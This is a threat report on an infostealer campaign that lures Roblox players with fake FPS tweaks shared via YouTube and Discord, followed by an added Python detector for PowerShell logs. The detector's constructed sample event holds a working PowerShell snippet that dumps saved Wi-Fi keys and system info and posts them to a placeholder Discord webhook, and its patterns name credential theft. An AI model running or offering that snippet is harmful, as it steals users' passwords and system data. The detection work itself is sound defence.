A new malicious campaign, dubbed “Tweaks Stealer”, is targeting the large user base of the online gaming platform Roblox. It distributes infostealer malware behind a deceptive lure and compromises victims’ sensitive information. Rather than hosting the payload on their own infrastructure, the attackers deliver it through YouTube and Discord; because these are legitimate, widely used services, the campaign sidesteps web filters that only block known malicious servers, which raises its severity.
The lure is the promise of a better gaming experience through higher Frames Per Second (FPS), something many players actively look for. The attackers publish YouTube videos that show how to increase FPS in Roblox and direct viewers to Discord groups under their control. Those groups offer free and paid versions of the supposed optimization files, which carry the infostealer; users who run them install the Tweaks malware and compromise their own systems.
The Tweaks malware, also known as Tweaker, has a dual function: it presents itself as the promised performance tweak while stealing data in the background, so victims have little reason to become suspicious. Technical analysis shows it collects a wide range of sensitive data, including Wi-Fi profiles and passwords, user location, system information, Roblox IDs, and in-game currency details. Exfiltration is handled by PowerShell-based scripts and Discord webhooks, so the stolen data is posted to a Discord channel the attackers control rather than to bespoke malware infrastructure. For defenders this means outbound traffic to discord.com looks unremarkable at the network level; PowerShell script block logging and control of which hosts may reach the Discord webhook API are the more useful places to look.
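The exfiltration pattern above (a PowerShell script posting collected data to a Discord webhook) can be triaged from PowerShell Script Block Logging (Event ID 4104). The following detector is an added example, not code from the article or from the campaign. The webhook URL shape is Discord’s public API format; the collection indicators (`netsh wlan ... key=clear` for saved Wi-Fi keys, `Get-ComputerInfo`/`systeminfo` for system information), the weights and the alert rule are this example’s assumptions, since the article names the stolen data but does not publish the script. The sample events are constructed for the example.

```python
"""
Added example: triage PowerShell Script Block Logging (Event ID 4104) text for the
"PowerShell script + Discord webhook" exfiltration pattern. Sample events below are
constructed for this example, not captured from the Tweaks campaign.
"""
import re
from dataclasses import dataclass, field

# Discord webhook endpoints have the shape https://discord.com/api/webhooks/<id>/<token>;
# discordapp.com and the canary/ptb subdomains serve the same API.
WEBHOOK_RE = re.compile(
    r"https?://(?:(?:canary|ptb)\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([\w\-]+)",
    re.IGNORECASE,
)

# (name, pattern, weight). Only the webhook indicator is taken from the article; the
# collection commands and weights are assumptions of this example.
INDICATORS = [
    ("discord_webhook", WEBHOOK_RE, 5),
    ("http_post", re.compile(r"Invoke-(?:RestMethod|WebRequest)\b.*?-Method\s+Post",
                             re.IGNORECASE | re.DOTALL), 2),
    # Assumed Wi-Fi key dump: netsh wlan show profile(s) ... key=clear reveals saved keys.
    ("wifi_key_dump", re.compile(r"netsh\s+wlan\s+show\s+profiles?\b.*?key\s*=\s*clear",
                                 re.IGNORECASE | re.DOTALL), 3),
    # Assumed system-information collection.
    ("sysinfo", re.compile(r"\b(?:Get-ComputerInfo|systeminfo)\b", re.IGNORECASE), 2),
]
COLLECTION = {"wifi_key_dump", "sysinfo"}


@dataclass
class Finding:
    event_id: str
    score: int = 0
    indicators: list = field(default_factory=list)
    webhook_ids: list = field(default_factory=list)  # numeric IDs only; the token is a secret

    @property
    def alert(self) -> bool:
        # Alert rule (assumption): a webhook URL alone is common in CI/chat-ops scripts,
        # so require a webhook plus at least one data-collection indicator.
        return "discord_webhook" in self.indicators and bool(COLLECTION & set(self.indicators))


def analyze_script_block(event_id: str, script_text: str) -> Finding:
    """Score one logged script block and extract webhook IDs as shareable IOCs."""
    finding = Finding(event_id)
    for name, pattern, weight in INDICATORS:
        if pattern.search(script_text):
            finding.indicators.append(name)
            finding.score += weight
    finding.webhook_ids = sorted({m.group(1) for m in WEBHOOK_RE.finditer(script_text)})
    return finding


def triage_events(events) -> list:
    """Analyze (event_id, script_text) pairs; highest score first."""
    findings = [analyze_script_block(eid, text) for eid, text in events]
    return sorted(findings, key=lambda f: f.score, reverse=True)


# Constructed sample script blocks: benign enumeration, a stealer-like block, and a
# chat-ops notification that uses a webhook without collecting anything.
SAMPLE_EVENTS = [
    ("4104-0001", "Get-ChildItem -Path C:\\Games\\Roblox -Recurse | Measure-Object"),
    ("4104-0002",
     "$hook = 'https://discord.com/api/webhooks/123456789012345678/aB3dE_fG-hIjK'\n"
     "$sys = Get-ComputerInfo | Select-Object CsName, OsName\n"
     "$profiles = netsh wlan show profiles | Select-String 'All User Profile'\n"
     "$keys = foreach ($p in $profiles) { netsh wlan show profile name=$($p.Line.Split(':')[1].Trim()) key=clear }\n"
     "Invoke-RestMethod -Uri $hook -Method Post -Body (@{content = ($sys, $keys | Out-String)} | ConvertTo-Json)"),
    ("4104-0003",
     "Invoke-RestMethod -Uri 'https://discord.com/api/webhooks/987654321098765432/zYxW' "
     "-Method Post -Body '{\"content\":\"build ok\"}'"),
]


if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"{f.event_id} score={f.score:2d} alert={f.alert} "
              f"indicators={f.indicators} webhook_ids={f.webhook_ids}")
```

The detector keeps only the numeric webhook ID, not the token: the ID is enough to correlate across hosts and to share as an indicator, while the token would let anyone post to (or delete) the attacker’s webhook, which is not something to put in a ticket. On a fleet where no legitimate tooling talks to Discord, the `alert` rule can be loosened to fire on any `discord.com/api/webhooks` URL, and the same path can be blocked at the proxy.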